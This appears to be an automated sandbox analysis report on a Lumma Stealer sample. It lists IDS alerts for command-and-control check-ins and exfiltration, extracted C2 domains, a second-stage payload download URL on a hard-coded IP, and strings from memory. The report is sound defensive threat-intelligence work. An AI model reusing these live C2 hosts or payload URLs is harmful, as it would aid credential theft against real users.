Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]	0_2_00B27FE1
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	0_2_00B337D0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00B2BFCA
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [edi], dx	0_2_00B24777
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then push eax	0_2_00B1BF40
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_00B28740

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49742 -> 104.21.96.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: fancywaxxers.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 30 Dec 2024 14:53:33 GMTContent-Type: application/octet-streamContent-Length: 2828800Last-Modified: Mon, 30 Dec 2024 14:24:01 GMTConnection: keep-aliveETag: "6772ad01-2b2a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 73 4f 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 67 61 75 71 6a 6e 62 68 00 a0 2a 00 00 a0 00 00 00 9c 2a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6e 66 62 6c 6a 72 6f 00 20 00 00 00 40 2b 00 00 04 00 00 00 04 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 08 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49744 -> 185.215.113.16:80

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.20
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.20
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: fancywaxxers.shop
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop

Source: UmotQ1qjLq.exe, 00000000.00000003.2072937199.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2073151395.00000000016B5000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000002.2157836075.0000000000FAB000.00000004.00000010.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000002.2158230840.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: UmotQ1qjLq.exe, 00000000.00000003.2072937199.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2073151395.00000000016B5000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000002.2158230840.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeW
Source: UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: UmotQ1qjLq.exe, 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2072937199.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1953164335.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1950540598.0000000001671000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000002.2158230840.000000000165A000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1900113407.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1966734692.00000000016A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_103.6.dr	String found in binary or memory: http://schema.org/Organization
Source: UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_103.6.dr, chromecache_110.6.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: https://aka.ms/msignite_docs_banner
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_103.6.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_103.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_103.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: UmotQ1qjLq.exe, 00000000.00000003.1933417555.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: UmotQ1qjLq.exe, 00000000.00000003.1933417555.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_108.6.dr, chromecache_86.6.dr	String found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
Source: UmotQ1qjLq.exe, 00000000.00000003.1933417555.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: UmotQ1qjLq.exe, 00000000.00000003.1933417555.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: UmotQ1qjLq.exe, 00000000.00000003.1900133376.0000000001642000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1949929378.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1944704562.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1966758838.0000000001672000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1900133376.0000000001679000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2073046149.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/
Source: UmotQ1qjLq.exe, 00000000.00000003.1966934832.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1931057736.0000000005C17000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1949492194.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1944704562.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1931399244.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/5
Source: UmotQ1qjLq.exe, 00000000.00000003.1968511238.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1900133376.0000000001679000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2073046149.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api
Source: UmotQ1qjLq.exe, 00000000.00000003.1900133376.0000000001679000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiV
Source: UmotQ1qjLq.exe, 00000000.00000003.1953079056.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1950540598.00000000016D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apite
Source: UmotQ1qjLq.exe, 00000000.00000003.2072679464.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/c
Source: UmotQ1qjLq.exe, 00000000.00000003.1966758838.0000000001672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/g
Source: UmotQ1qjLq.exe, 00000000.00000003.2073046149.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/ode
Source: UmotQ1qjLq.exe, 00000000.00000003.1953079056.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1950540598.00000000016D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/api
Source: chromecache_103.6.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_103.6.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_103.6.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_103.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
